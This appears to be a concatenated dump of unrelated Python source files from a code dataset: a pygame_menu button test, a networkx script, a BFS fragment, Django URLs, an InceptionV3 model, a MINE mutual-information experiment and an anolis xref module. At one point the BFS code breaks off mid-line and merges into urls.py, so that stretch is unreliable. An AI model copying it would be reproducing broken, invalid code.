to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the Software\nis furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n-------------------------------------------------------------------------------\n\"\"\"\n\n__all__ = ['ButtonWidgetTest']\n\nfrom test._utils import MenuUtils, surface, PygameEventUtils, BaseTest, PYGAME_V2\n\nimport pygame\nimport pygame_menu\n\nfrom pygame_menu.widgets import Button\n\n\nclass ButtonWidgetTest(BaseTest):\n\n def test_button(self) -> None:\n \"\"\"\n Test button widget.\n \"\"\"\n menu = MenuUtils.generic_menu()\n menu2 = MenuUtils.generic_menu()\n\n # Valid\n def test() -> bool:\n \"\"\"\n Callback.\n \"\"\"\n return True\n\n # Invalid ones\n invalid = [\n bool, # type\n object, # object\n 1, # int\n 'a', # str\n True, # bool\n pygame, # module\n surface, # pygame\n 1.1, # float\n menu.add.button('eee'), # widget\n [1, 2, 3], # list\n (1, 2, 3), # tuple\n pygame_menu.BaseImage(pygame_menu.baseimage.IMAGE_EXAMPLE_GRAY_LINES) # baseimage\n ]\n for i in invalid:\n self.assertRaises(ValueError, lambda: menu.add.button('b1', i))\n\n # Valid\n valid = [\n menu2,\n test,\n pygame_menu.events.NONE,\n pygame_menu.events.PYGAME_QUIT,\n pygame_menu.events.PYGAME_WINDOWCLOSE,\n None,\n lambda: test(),\n None\n ]\n for v in valid:\n self.assertTrue(menu.add.button('b1', v) is not None)\n\n btn = menu.add.button('b1', menu2)\n for v in [menu, 1, bool, object, [1, 2, 3], (1, 2, 3)]:\n self.assertRaises(AssertionError, lambda: btn.update_callback(v))\n btn.update_callback(test)\n\n # Invalid recursive menu\n self.assertRaises(ValueError, lambda: menu.add.button('bt', menu))\n\n # Test callback\n test = [False]\n\n def callback(t=False) -> None:\n \"\"\"\n Callback.\n \"\"\"\n test[0] = t\n\n btn = Button('epic', t=True, onreturn=callback)\n btn.apply()\n self.assertTrue(test[0])\n test[0] = False\n\n def callback() -> None:\n \"\"\"\n Callback.\n \"\"\"\n test[0] = False\n\n btn = Button('epic', onreturn=callback)\n btn.apply()\n self.assertFalse(test[0])\n\n # Test with no kwargs\n def callback(**kwargs) -> None:\n \"\"\"\n Callback.\n \"\"\"\n self.assertEqual(len(kwargs.keys()), 0)\n\n btn = menu.add.button('epic', callback, accept_kwargs=False)\n btn.apply()\n\n # Test with kwargs\n def callback(**kwargs) -> None:\n \"\"\"\n Callback.\n \"\"\"\n self.assertEqual(len(kwargs.keys()), 1)\n self.assertTrue(kwargs.get('key', False))\n\n btn = Button('epic', onreturn=callback, key=True)\n self.assertTrue(btn._ignores_keyboard_nonphysical())\n btn.apply()\n btn = menu.add.button('epic', callback, accept_kwargs=True, key=True)\n btn.apply()\n\n # Test pygame events\n btn = menu.add.button('epic', pygame_menu.events.PYGAME_QUIT)\n self.assertEqual(btn._onreturn, menu._exit)\n btn = menu.add.button('epic', pygame_menu.events.PYGAME_WINDOWCLOSE)\n self.assertEqual(btn._onreturn, menu._exit)\n\n # Test None\n btn = menu.add.button('epic', pygame_menu.events.NONE)\n self.assertIsNone(btn._onreturn)\n btn = menu.add.button('epic')\n self.assertIsNone(btn._onreturn)\n\n # Test invalid kwarg\n self.assertRaises(ValueError, lambda: menu.add.button('epic', callback, key=True))\n\n # Remove button\n menu.remove_widget(btn)\n self.assertRaises(ValueError, lambda: menu.remove_widget(btn))\n\n # Test underline\n # Add underline\n btn = menu.add.button('epic', pygame_menu.events.NONE)\n self.assertEqual(btn._decorator._total_decor(), 0)\n btn.add_underline((0, 0, 0), 1, 1, force_render=True)\n self.assertNotEqual(btn._last_underline[0], '')\n self.assertEqual(btn._decorator._total_decor(), 1)\n btn.remove_underline()\n self.assertEqual(btn._last_underline[0], '')\n\n # Test return fun\n def fun() -> str:\n \"\"\"\n This should return \"nice\".\n \"\"\"\n return 'nice'\n\n btn = menu.add.button('', fun)\n self.assertEqual(btn.apply(), 'nice')\n btn.readonly = True\n self.assertIsNone(btn.apply())\n self.assertFalse(btn.update(PygameEventUtils.keydown(pygame_menu.controls.KEY_APPLY)))\n\n # Test button to menu\n btn_menu = menu.add.button('to2', menu2)\n self.assertTrue(btn_menu.to_menu)\n menu.full_reset()\n self.assertTrue(btn_menu.update(PygameEventUtils.keydown(pygame_menu.controls.KEY_APPLY)))\n self.assertEqual(menu.get_current(), menu2)\n menu.full_reset()\n self.assertEqual(menu.get_current(), menu)\n\n # Warns if adding button to menu\n btn.set_menu(None)\n btn.to_menu = True\n menu2.add.generic_widget(btn)\n\n # Test extreme resize\n btn.resize(1, 1)\n btn.set_max_height(None)\n btn.set_max_width(None)\n btn.flip(True, True)\n self.assertEqual(btn._flip, (True, True))\n\n # Test consistency if active\n btn.active = True\n btn._selected = False\n btn.draw(surface)\n self.assertFalse(btn.active)\n\n # Try onchange\n btn._onchange = lambda: None\n self.assertIsNone(btn.change())\n\n def test_empty_title(self) -> None:\n \"\"\"\n Test empty title.\n \"\"\"\n menu = MenuUtils.generic_menu()\n btn = menu.add.button('')\n p = btn._padding\n self.assertEqual(btn.get_width(), p[1] + p[3])\n self.assertEqual(btn.get_height(), p[0] + p[2] + 41 if PYGAME_V2 else 42)\n\n def test_value(self) -> None:\n \"\"\"\n Test button value.\n \"\"\"\n menu = MenuUtils.generic_menu()\n btn = menu.add.button('button')\n self.assertRaises(ValueError, lambda: btn.get_value())\n self.assertRaises(ValueError, lambda: btn.set_value('value'))\n self.assertFalse(btn.value_changed())\n btn.reset_value()\n","sub_path":"test/test_widget_button.py","file_name":"test_widget_button.py","file_ext":"py","file_size_in_byte":7637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"644210854","text":"import networkx as nx\n\n# brain = brain=nx.Dibrainraph() #for the first time\nbrain = nx.read_edgelist('db.edgelist', create_using=nx.Dibrainraph(), nodetype=str, data=(('weight', int),)) \n\n\ndef simple_learn(brain):\n while True:\n s = input()\n if s == 'quit':\n return\n else:\n ind = s.find(' ')\n inp_edge = (s[:ind], s[ind + 1:])\n if inp_edge in brain.edges():\n \tbrain.edge[s[:ind]][s[ind + 1:]]['weight'] += 1\n else:\n \tbrain.add_edges_from([inp_edge], weight = 1)\n nx.write_edgelist(brain,'db.edgelist',data=['weight'])\n\nsimple_learn(brain)\n\n","sub_path":"veera/consolelearning.py","file_name":"consolelearning.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"269983633","text":"import sys\nfrom collections import deque\n\nsys.stdin = open('input.txt','r')\n\nN,M = map(int,sys.stdin.readline().rstrip().split())\n\nmap = [[i for i in sys.stdin.readline().rstrip()] for j in range(N)]\nvisit = [[[[[0 for i in range(M)] for j in range(N)] for k in range(4)] for q in range(2)] for p in range(2)]\n\ndef inRange(a,b):\n if (0<=a/',views.productDetailPage,name='product_detail'),\r\n path('product/',views.productPage,name='product'),\r\n path('quickView/',views.quickView,name='quickView'),\r\n path('product/sortBy//',views.productSortBy,name='productSortBy'),\r\n \r\n]","sub_path":"Product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"38745265","text":"import tensorflow as tf\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\ntf.get_logger().setLevel('ERROR')\nimport tensorflow.keras.layers as layers\nimport tensorflow.keras.models as models\n\n\ndef conv2d_bn(x,\n filters,\n num_row,\n num_col,\n padding='same',\n strides=(1, 1),\n name=None):\n \"\"\"Utility function to apply conv + BN.\n # Arguments\n x: input tensor.\n filters: filters in `Conv2D`.\n num_row: height of the convolution kernel.\n num_col: width of the convolution kernel.\n padding: padding mode in `Conv2D`.\n strides: strides in `Conv2D`.\n name: name of the ops; will become `name + '_conv'`\n for the convolution and `name + '_bn'` for the\n batch norm layer.\n # Returns\n Output tensor after applying `Conv2D` and `BatchNormalization`.\n \"\"\"\n if name is not None:\n bn_name = name + '_bn'\n conv_name = name + '_conv'\n else:\n bn_name = None\n conv_name = None\n \n bn_axis = 3\n x = layers.Conv2D(\n filters, (num_row, num_col),\n strides=strides,\n padding=padding,\n use_bias=False,\n name=conv_name)(x)\n x = layers.BatchNormalization(axis=bn_axis, scale=False, name=bn_name)(x)\n x = layers.Activation('relu', name=name)(x)\n return x\n\ndef InceptionV3():\n img_input = layers.Input(shape=(256,256,3))\n \n channel_axis = 3\n \n x = conv2d_bn(img_input, 32, 3, 3, strides=(2, 2), padding='valid')\n x = conv2d_bn(x, 32, 3, 3, padding='valid')\n x = conv2d_bn(x, 64, 3, 3)\n x = layers.MaxPooling2D((3, 3), strides=(2, 2))(x)\n \n x = conv2d_bn(x, 80, 1, 1, padding='valid')\n x = conv2d_bn(x, 192, 3, 3, padding='valid')\n x = layers.MaxPooling2D((3, 3), strides=(2, 2))(x)\n \n # mixed 0: 35 x 35 x 256\n branch1x1 = conv2d_bn(x, 64, 1, 1)\n \n branch5x5 = conv2d_bn(x, 48, 1, 1)\n branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)\n \n branch3x3dbl = conv2d_bn(x, 64, 1, 1)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n \n branch_pool = layers.AveragePooling2D((3, 3),\n strides=(1, 1),\n padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 32, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch5x5, branch3x3dbl, branch_pool],\n axis=channel_axis,\n name='mixed0')\n \n # mixed 1: 35 x 35 x 288\n branch1x1 = conv2d_bn(x, 64, 1, 1)\n \n branch5x5 = conv2d_bn(x, 48, 1, 1)\n branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)\n \n branch3x3dbl = conv2d_bn(x, 64, 1, 1)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n \n branch_pool = layers.AveragePooling2D((3, 3),\n strides=(1, 1),\n padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 64, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch5x5, branch3x3dbl, branch_pool],\n axis=channel_axis,\n name='mixed1')\n \n # mixed 2: 35 x 35 x 288\n branch1x1 = conv2d_bn(x, 64, 1, 1)\n \n branch5x5 = conv2d_bn(x, 48, 1, 1)\n branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)\n \n branch3x3dbl = conv2d_bn(x, 64, 1, 1)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n \n branch_pool = layers.AveragePooling2D((3, 3),\n strides=(1, 1),\n padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 64, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch5x5, branch3x3dbl, branch_pool],\n axis=channel_axis,\n name='mixed2')\n \n # mixed 3: 17 x 17 x 768\n branch3x3 = conv2d_bn(x, 384, 3, 3, strides=(2, 2), padding='valid')\n \n branch3x3dbl = conv2d_bn(x, 64, 1, 1)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)\n branch3x3dbl = conv2d_bn(\n branch3x3dbl, 96, 3, 3, strides=(2, 2), padding='valid')\n \n branch_pool = layers.MaxPooling2D((3, 3), strides=(2, 2))(x)\n x = layers.concatenate(\n [branch3x3, branch3x3dbl, branch_pool],\n axis=channel_axis,\n name='mixed3')\n \n # mixed 4: 17 x 17 x 768\n branch1x1 = conv2d_bn(x, 192, 1, 1)\n \n branch7x7 = conv2d_bn(x, 128, 1, 1)\n branch7x7 = conv2d_bn(branch7x7, 128, 1, 7)\n branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)\n \n branch7x7dbl = conv2d_bn(x, 128, 1, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 1, 7)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)\n \n branch_pool = layers.AveragePooling2D((3, 3),\n strides=(1, 1),\n padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 192, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch7x7, branch7x7dbl, branch_pool],\n axis=channel_axis,\n name='mixed4')\n \n # mixed 5, 6: 17 x 17 x 768\n for i in range(2):\n branch1x1 = conv2d_bn(x, 192, 1, 1)\n \n branch7x7 = conv2d_bn(x, 160, 1, 1)\n branch7x7 = conv2d_bn(branch7x7, 160, 1, 7)\n branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)\n \n branch7x7dbl = conv2d_bn(x, 160, 1, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 1, 7)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)\n \n branch_pool = layers.AveragePooling2D(\n (3, 3), strides=(1, 1), padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 192, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch7x7, branch7x7dbl, branch_pool],\n axis=channel_axis,\n name='mixed' + str(5 + i))\n \n # mixed 7: 17 x 17 x 768\n branch1x1 = conv2d_bn(x, 192, 1, 1)\n \n branch7x7 = conv2d_bn(x, 192, 1, 1)\n branch7x7 = conv2d_bn(branch7x7, 192, 1, 7)\n branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)\n \n branch7x7dbl = conv2d_bn(x, 192, 1, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)\n \n branch_pool = layers.AveragePooling2D((3, 3),\n strides=(1, 1),\n padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 192, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch7x7, branch7x7dbl, branch_pool],\n axis=channel_axis,\n name='mixed7')\n \n # mixed 8: 8 x 8 x 1280\n branch3x3 = conv2d_bn(x, 192, 1, 1)\n branch3x3 = conv2d_bn(branch3x3, 320, 3, 3,\n strides=(2, 2), padding='valid')\n \n branch7x7x3 = conv2d_bn(x, 192, 1, 1)\n branch7x7x3 = conv2d_bn(branch7x7x3, 192, 1, 7)\n branch7x7x3 = conv2d_bn(branch7x7x3, 192, 7, 1)\n branch7x7x3 = conv2d_bn(\n branch7x7x3, 192, 3, 3, strides=(2, 2), padding='valid')\n \n branch_pool = layers.MaxPooling2D((3, 3), strides=(2, 2))(x)\n x = layers.concatenate(\n [branch3x3, branch7x7x3, branch_pool],\n axis=channel_axis,\n name='mixed8')\n \n # mixed 9: 8 x 8 x 2048\n for i in range(2):\n branch1x1 = conv2d_bn(x, 320, 1, 1)\n \n branch3x3 = conv2d_bn(x, 384, 1, 1)\n branch3x3_1 = conv2d_bn(branch3x3, 384, 1, 3)\n branch3x3_2 = conv2d_bn(branch3x3, 384, 3, 1)\n branch3x3 = layers.concatenate(\n [branch3x3_1, branch3x3_2],\n axis=channel_axis,\n name='mixed9_' + str(i))\n \n branch3x3dbl = conv2d_bn(x, 448, 1, 1)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 384, 3, 3)\n branch3x3dbl_1 = conv2d_bn(branch3x3dbl, 384, 1, 3)\n branch3x3dbl_2 = conv2d_bn(branch3x3dbl, 384, 3, 1)\n branch3x3dbl = layers.concatenate(\n [branch3x3dbl_1, branch3x3dbl_2], axis=channel_axis)\n \n branch_pool = layers.AveragePooling2D(\n (3, 3), strides=(1, 1), padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 192, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch3x3, branch3x3dbl, branch_pool],\n axis=channel_axis,\n name='mixed' + str(9 + i))\n \n x = layers.GlobalAveragePooling2D()(x)\n x = layers.Dense(256)(x)\n \n inputs = img_input\n # Create model.\n model = models.Model(inputs, x, name='inception_v3')\n \n model.load_weights(\"face_recog_model-k-n-face_model.h5\")\n return model","sub_path":"Backend[Flask]/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"59675119","text":"n=int(input())\nrev=0\ntemp=n\nwhile(n>0):\n dig=n%10\t\n rev=rev*10+dig\n n=n//10\nif(temp==rev):\n print(\"no. is palindrome\")\nelse:\n print(\"no. is not palindrome\")\n\n","sub_path":"tprgm_palindrome.py","file_name":"tprgm_palindrome.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3499036","text":"import usb.core\nimport usb.util\nfrom datetime import datetime\n\ndev = usb.core.find(idVendor=0x090c, idProduct=0x4096)\nprint(dev)\n\nITERATIONS = 1000\nBUFFER_SIZE = 65536\n\ndev.set_configuration()\n\nstarttime = datetime.now()\n\nfor i in range(0, ITERATIONS):\n data = dev.read(0x81, BUFFER_SIZE, 200)\n\nendtime = datetime.now()\n\ndelta = (endtime-starttime).total_seconds()\n\nprint(\"USB Time: {} seconds\".format(delta))\n\nspeed_Bsec = (ITERATIONS*BUFFER_SIZE)/delta\nspeed_MBsec = speed_Bsec/(1024*1024)\n\nprint(\"Transfer speed: {} MB/Sec\".format(speed_MBsec))\n","sub_path":"pythonTest/USB/usb30test.py","file_name":"usb30test.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"454650719","text":"\"\"\"\nUse MINE to estimate the MI(x, y) and MI(h, y)\nhttps://github.com/sungyubkim/MINE-Mutual-Information-Neural-Estimation-/blob/master/MINE.ipynb\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.autograd as autograd\nimport torchvision\nimport torchvision.transforms as transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\nfrom tqdm import tqdm\n\nfrom models.resnet import ResNet34\nfrom models.wideresnet import wide_resnet_34_10, adjust_learning_rate\n\n\ndef mutual_information(joint, marginal, mine_net):\n t = mine_net(joint)\n et = torch.exp(mine_net(marginal))\n mi_lb = torch.mean(t) - torch.log(torch.mean(et))\n return mi_lb, t, et\n\n\ndef learn_mine(batch, mine_net, mine_net_optim, ma_et, ma_rate=0.01):\n # batch is a tuple of (joint, marginal)\n joint, marginal = batch\n # joint = torch.autograd.Variable(torch.FloatTensor(joint)).cuda()\n # marginal = torch.autograd.Variable(torch.FloatTensor(marginal)).cuda()\n mi_lb, t, et = mutual_information(joint, marginal, mine_net)\n ma_et = (1 - ma_rate) * ma_et + ma_rate * torch.mean(et)\n\n # unbiasing use moving average\n loss = -(torch.mean(t) - (1 / ma_et.mean()).detach() * torch.mean(et))\n # use biased estimator\n # loss = - mi_lb\n\n mine_net_optim.zero_grad()\n autograd.backward(loss)\n mine_net_optim.step()\n return mi_lb, ma_et\n\n\ndef sample_batch(data, device, robust_net, h, sample_mode='joint'):\n x, y = data\n x = x.to(device)\n y = y.type(torch.float).to(device)\n y = (y - 0.45) / 9 # normalize y\n if h:\n x = robust_net(x)\n dims = 1, 640, 8, 8\n else:\n dims = 1, 3, 32, 32\n if sample_mode == 'joint':\n y = y.unsqueeze(-1).unsqueeze(-1).unsqueeze(-1)\n y = y.repeat(dims).type(torch.float)\n batch = torch.cat((x, y), 1)\n else:\n index = torch.randperm(y.shape[0])\n y = y[index]\n y = y.unsqueeze(-1).unsqueeze(-1).unsqueeze(-1)\n y = y.repeat(dims).type(torch.float)\n batch = torch.cat((x, y), 1)\n return batch\n\n\ndef ma(a, window_size=100):\n return [np.mean(a[i:i+window_size]) for i in range(0, len(a)-window_size)]\n\n\ndef train(trainloader, testloader, robust_net, mine_net, mine_net_optim, device, epochs, h):\n #\n iterator = tqdm(trainloader, ncols=0, leave=False)\n mi_lb_list = list()\n ma_et = 1.\n for i in range(1, epochs + 1):\n mine_net.train()\n # adjust_learning_rate(mine_net_optim, i)\n for j, data in enumerate(iterator):\n batch = sample_batch(data, device, robust_net, h), \\\n sample_batch(data, device, robust_net, h, sample_mode='marginal')\n mi_lb, ma_et = learn_mine(batch, mine_net, mine_net_optim, ma_et)\n mi_lb_list.append(mi_lb.item())\n desc = 'mi_lb: ' + \"{:10.4f}\".format(mi_lb.item())\n iterator.set_description(desc)\n\n print('Epoch: {}; mi_lb: {}'.format(i, mi_lb_list[-1]))\n\n return mi_lb_list\n\n\ndef get_cifar10(batch_size):\n transform_train = transforms.Compose([\n # transforms.RandomCrop(32, padding=4),\n # transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n # transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n # Normalization messes with l-inf bounds.\n ])\n\n trainset = torchvision.datasets.CIFAR10(root='data', train=True, download=True, transform=transform_train)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, drop_last=True)\n transform_test = transforms.Compose([\n transforms.ToTensor()\n ])\n testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test)\n testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=2)\n\n return trainloader, testloader\n\n\ndef draw():\n version = 'sung'\n plt.figure(figsize=[8, 5])\n mi_hy = 'mutual_info/mi_hy_{}.txt'.format(version)\n mi_xy = 'mutual_info/mi_xy_{}.txt'.format(version)\n hy = np.loadtxt(mi_hy)\n xy = np.loadtxt(mi_xy)\n # hy = ma(hy)\n # xy = ma(xy)\n plot_x = np.arange(len(hy))\n plt.plot(plot_x, hy, label='I(h, y)')\n plt.plot(plot_x, xy, label='I(x, y)')\n plt.title('MINE {}'.format(version))\n plt.xlabel('Iteration')\n plt.ylabel('Mutual Information')\n plt.legend()\n plt.savefig('mine_fig/hy_xy_{}.png'.format(version), dpi=300)\n\n\ndef calc_mi():\n parser = argparse.ArgumentParser(description='MINE robust model')\n parser.add_argument('--seed', default=9527, type=int)\n parser.add_argument('--epochs', default=21, type=int)\n parser.add_argument('--learning_rate', default=1e-3, type=float)\n parser.add_argument('--momentum', default=0.9, type=float)\n parser.add_argument('--weight_decay', default=1e-3, type=float)\n parser.add_argument('--h', default=True, type=bool) # whether I(x, y): False or I(h, y): True\n parser.add_argument('--batch_size', default=5, type=int)\n args = parser.parse_args()\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n robust_model = 'checkpoint/adv_ckpt_41.pt'\n robust_net = wide_resnet_34_10()\n checkpoint = torch.load(robust_model)\n robust_net.load_state_dict(checkpoint['net'])\n robust_net.to(device)\n\n if args.h:\n in_channels = 1280 # 6 = 3 * 2 for MI(x, y), 1280 = 640 * 2 for MI(h, y)\n else:\n in_channels = 6\n\n resnet34 = ResNet34(in_channels, args.h).cuda()\n trainloader, testloader = get_cifar10(args.batch_size)\n optimizer = optim.Adam(resnet34.parameters(), lr=args.learning_rate, weight_decay=args.weight_decay)\n mi_lb_list = train(trainloader, testloader, robust_net, resnet34, optimizer, device, args.epochs, args.h)\n result_cor_ma = ma(mi_lb_list)\n print('h: {}, last MI: {}'.format(args.h, result_cor_ma[-1]))\n if args.h:\n with open('mi_hy_sung.txt', 'w') as filehandle:\n for listitem in result_cor_ma:\n filehandle.write('%s\\n' % listitem)\n else:\n with open('mi_xy_sung.txt', 'w') as filehandle:\n for listitem in result_cor_ma:\n filehandle.write('%s\\n' % listitem)\n\n\nif __name__ == '__main__':\n # calc_mi()\n draw()\n","sub_path":"mutual_info/mine_sung.py","file_name":"mine_sung.py","file_ext":"py","file_size_in_byte":6292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148878831","text":"def main():\r\n def szokoev_e(sz):\r\n if sz % 400 ==0:\r\n return True\r\n elif sz % 100 == 0:\r\n return False\r\n elif sz % 4 == 0:\r\n return True\r\n return False\r\n\r\n sz = int(input(\"Adjon meg egy számot:\"))\r\n print(sz)\r\n if szokoev_e(sz):\r\n print(\"Szökőév\")\r\n else:\r\n print(\"Nem szökőév\")\r\nmain()\r\n","sub_path":"6het2fel.py","file_name":"6het2fel.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"122271849","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/anolislib/processes/xref.py\n# Compiled at: 2013-02-16 15:38:05\nfrom __future__ import unicode_literals\nimport re\nfrom lxml import etree\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nfrom anolislib import utils\ninstance_elements = frozenset([b'span', b'abbr', b'code', b'var', b'i'])\nw3c_instance_elements = frozenset([b'abbr', b'acronym', b'b', b'bdo', b'big',\n b'code', b'del', b'em', b'i', b'ins',\n b'kbd', b'label', b'legend', b'q', b'samp',\n b'small', b'span', b'strong', b'sub',\n b'sup', b'tt', b'var'])\ninstance_not_in_stack_with = frozenset([b'dfn'])\nnon_alphanumeric_spaces = re.compile(b'[^a-zA-Z0-9 \\\\-\\\\_\\\\/\\\\|]+')\n\nclass xref(object):\n \"\"\"Add cross-references.\"\"\"\n\n def __init__(self, ElementTree, dump_xrefs=b'', dump_backrefs=False, **kwargs):\n self.dfns = {}\n self.instances = {}\n self.buildReferences(ElementTree, dump_backrefs=dump_backrefs, **kwargs)\n if dump_xrefs:\n self.dump(self.getDfns(dump_xrefs), dump_xrefs, **kwargs)\n self.addReferences(ElementTree, dump_backrefs=dump_backrefs, **kwargs)\n if dump_backrefs:\n self.dump(self.instances, b'backrefs.json', **kwargs)\n\n def buildReferences(self, ElementTree, allow_duplicate_dfns=False, **kwargs):\n for dfn in ElementTree.iter(b'dfn'):\n terms = self.getTerm(dfn, **kwargs).split(b'|')\n for term in set(t for t in terms if t):\n if not allow_duplicate_dfns and term in self.dfns:\n raise DuplicateDfnException(b'The term \"%s\" is defined more than once' % term)\n link_to = dfn\n for parent_element in dfn.iterancestors(tag=etree.Element):\n if parent_element.tag in utils.heading_content:\n link_to = parent_element\n break\n\n id = utils.generateID(link_to, **kwargs)\n link_to.set(b'id', id)\n self.dfns[term] = id\n self.instances[term] = []\n\n def getDfns(self, dump_xrefs, **kwargs):\n try:\n fp = open(dump_xrefs, b'r')\n data = json.load(fp)\n fp.close()\n data[b'definitions'] = self.dfns\n return data\n except IOError:\n raise XrefsFileNotCreatedYetException(b\"No such file or directory: '%s'. Please create it first.\\nIt should contain a an object with a 'url' property (whose value ends with a '#').\" % dump_xrefs)\n\n def dump(self, obj, f, **kwargs):\n d = json.dumps(obj, sort_keys=True, allow_nan=False, indent=2, separators=(',',\n ': '))\n fp = open(f, b'w')\n fp.write(d + b'\\n')\n fp.close()\n\n def addReferences(self, ElementTree, w3c_compat=False, w3c_compat_xref_elements=False, w3c_compat_xref_a_placement=False, use_strict=False, dump_backrefs=False, **kwargs):\n for element in ElementTree.iter(tag=etree.Element):\n if element.tag in instance_elements or (w3c_compat or w3c_compat_xref_elements) and element.tag in w3c_instance_elements:\n term = self.getTerm(element, w3c_compat=w3c_compat, **kwargs)\n if term in self.dfns:\n goodParentingAndChildren = True\n for parent_element in element.iterancestors(tag=etree.Element):\n if parent_element.tag in instance_not_in_stack_with or utils.isInteractiveContent(parent_element):\n goodParentingAndChildren = False\n break\n else:\n for child_element in element.iterdescendants(tag=etree.Element):\n if child_element.tag in instance_not_in_stack_with or utils.isInteractiveContent(child_element):\n goodParentingAndChildren = False\n break\n\n if goodParentingAndChildren:\n if element.tag == b'span':\n element.tag = b'a'\n element.set(b'href', b'#' + self.dfns[term])\n link = element\n else:\n link = etree.Element(b'a', {b'href': b'#' + self.dfns[term]})\n if w3c_compat or w3c_compat_xref_a_placement:\n for node in element:\n link.append(node)\n\n link.text = element.text\n element.text = None\n element.append(link)\n else:\n element.addprevious(link)\n link.append(element)\n link.tail = link[0].tail\n link[0].tail = None\n if dump_backrefs:\n t = utils.non_ifragment.sub(b'-', term.strip(utils.spaceCharacters)).strip(b'-')\n id = b'instance_' + t + b'_' + str(len(self.instances[term]))\n link.set(b'id', id)\n self.instances[term].append(id)\n elif use_strict and term and not utils.elementHasClass(element, b'secno') and b'data-anolis-spec' not in element.attrib and b'data-anolis-ref' not in element.attrib and element.getparent().tag not in instance_not_in_stack_with:\n raise 